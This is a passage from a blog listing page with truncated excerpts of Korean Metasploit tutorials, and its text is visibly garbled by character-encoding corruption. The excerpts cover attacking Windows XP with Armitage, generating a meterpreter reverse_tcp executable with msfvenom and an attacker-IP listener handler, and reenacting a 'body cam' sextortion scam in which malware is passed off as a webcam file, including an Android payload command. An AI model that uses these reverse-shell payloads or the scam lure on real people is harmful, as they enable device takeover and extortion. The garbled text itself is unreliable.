๐’ƒ๐’†๐’‚๐’–๐’•๐’š ๐’Š๐’๐’•๐’†๐’๐’๐’Š๐’ˆ๐’†๐’๐’•
728x90
๋ฐ˜์‘ํ˜•
article thumbnail
Hack windows XP with armitage in kali
Metasploit 2016. 12. 23. 22:54

๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. ๋จผ์ € service apache2 start ๋ฅผ ์‹คํ–‰ํ•ด์ค€๋‹ค. ๋‹ค์Œ์€ service postgresql start ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰์‹œํ‚จ ํ›„ service metasploit start ๋ฅผ ์‹คํ–‰ํ•ด์ค€๋‹ค. ๋‹ค์Œ์€ armitage๋ฅผ ์‹คํ–‰์‹œํ‚จ๋‹ค. ์ด๋Ÿฌํ•œ ์ฐฝ์„ ๋ณผ์ˆ˜์žˆ์„ ํ…๋ฐ connect๋ฅผ ๋ˆ„๋ฅด๊ณ  yes๋ฅผ ๋ˆ„๋ฅด๊ณ  ๊ธฐ๋‹ค๋ฆฌ๋ฉด ์Œ~~ ์Œ~~~ ๊ธฐ๋‹ค๋ฆฌ๋ฉด ์ด๋Ÿฌํ•œ ์ฐฝ์ด ๋œฌ๋‹ค. tab์ฐฝ์—์„œ hosts -> add hosts ๋ฅผ ๋ˆ„๋ฅด๋ฉด ์ด๋ ‡๊ฒŒ victim IP๋ฅผ ์ž…๋ ฅํ•  ์ˆ˜์žˆ๋„๋ก ๋œฌ๋‹ค. ๋“ฑ๋กํ›„ OS ๋ฅผ ์•Œ์•„๋ณด์ž ๋‹ค์‹œ host ํƒญ์—์„œ nmap scan -> quick scan(os detect)๋ฅผ ํด๋ฆญํ•˜๊ณ  yes ๊ทธ๋Ÿผ ์ฝ˜์†”์ฐฝ์— ์ด๋Ÿฌํ•œ ๊ฒƒ์„ ํ™•์ธํ• ์ˆ˜ ์žˆ๋‹ค. ์ด์ œ ์ทจ์•ฝ์ ์„ ์ด์šฉํ•˜์—ฌ ๊ณต๊ฒฉํ•˜๊ธฐ ์œ„ํ•ด ์–ด๋– ํ•œ..

article thumbnail
Kali Linux by pass - Hack Windows metasploit tutorial
Metasploit 2016. 12. 22. 18:48

๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. ๋จผ์ € service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[์›ํ•˜๋Š” ํฌํŠธ] -f exe > filename.exe ๊ทธ๋Ÿผ /root ํด๋”์— exeํŒŒ์ผ์ด ์ƒ๊ธด๊ฒƒ์„ ํ™•์ธํ• ์ˆ˜ ์žˆ๋‹ค.๊ทธ๋Ÿผ ๋‹ค์Œ์œผ๋กœ๋Š” ์ปจํŠธ๋กคํ•  ํ•ธ๋“ค๋Ÿฌ๋ฅผ ๋งŒ๋“ค์–ด๋ณด์ž. ๋จผ์ € msfconsole์„ ์ž…๋ ฅํ•œ๋‹ค. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [์šฐ๋ฆฌ๊ฐ€ ํŒŒ์ผ์„ ๋งŒ๋“ค๋•Œ ์‚ฌ์šฉํ•œ payload]set LHOST [attacker ip]set LP..

article thumbnail
์š”์ฆ˜ ์œ ํ–‰ ํ•˜๋˜ ๋ชธ์บ  (๊ธฐ์ดˆ๋ฐฉ์‹)
Metasploit 2016. 12. 15. 22:37

์š”์ฆ˜ ๋ชธ์บ ์ด ์œ ํ–‰์„ ํ–ˆ์—ˆ๋‹ค. ๋Œ€์ถฉ ์›๋ฆฌ๋ฅผ ๋ณด๋ฉด ์Šค์นดxx๊ฐ™์€ ๊ณณ์—์„œ ์ฑ„ํŒ…์„ ํ•˜๋‹ค๊ฐ€ ๋ชธ์บ ์„ ํ•˜์ž๊ณ  ํŒŒ์ผ์„ ๋ฐ›์œผ๋ผ๊ณ  ํ•œ๋‹ค. (๋ชธ์บ ์„ ํ•˜๊ธฐ์œ„ํ•œ ์ „์šฉ ํŒŒ์ผ์ด๋ผ ๋ปฅ์„ ์นœ๋‹ค.) ๊ทธ๋Ÿฌ๊ณ  ํŒŒ์ผ์„ ๋ณด๋‚ด๋Š”๋ฐ ๊ทธ ํŒŒ์ผ์€ ๋‹น์—ฐํžˆ ์•…์„ฑ์ฝ”๋“œ !! :) ์ด์ œ ๊ทธ๊ฒƒ์„ ์žฌ์—ฐํ•ด๋ณด์ž ๊ทธ์ „์— ๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค.์‹œ์ž‘ํ•ด๋ณด์ž :X ๋จผ์ € service apache2 start๋กœ ์•„ํŒŒ์น˜๋ฅผ ์‹คํ–‰ ์‹œ์ผœ์ฃผ๊ณ  service postgresql start ๋กœ postgresql ๋˜ํ•œ ์‹œํ‚จ๋‹ค. ๊ถ๊ทน์ ์ธ ๋ช…๋ น์–ด service metasploit start ๋กœ metasploit ๋˜ํ•œ ์‹คํ–‰์‹œํ‚จ๋‹ค. ๊ทธ ํ›„ ์ด์ œ ์•…์„ฑ์ฝ”๋“œ๋ฅผ ๋งŒ๋“ค์–ด์•ผ ํ•˜๋Š”๋ฐ...๋ช…๋ น์–ด msfvenom์„ ์ด์šฉ ํ•˜์—ฌ ๋งŒ๋“ค์–ด ๋ณด์ž.msfvenom -p android/meterpreter/..

728x90
๋ฐ˜์‘ํ˜•
profile on loading

Loading...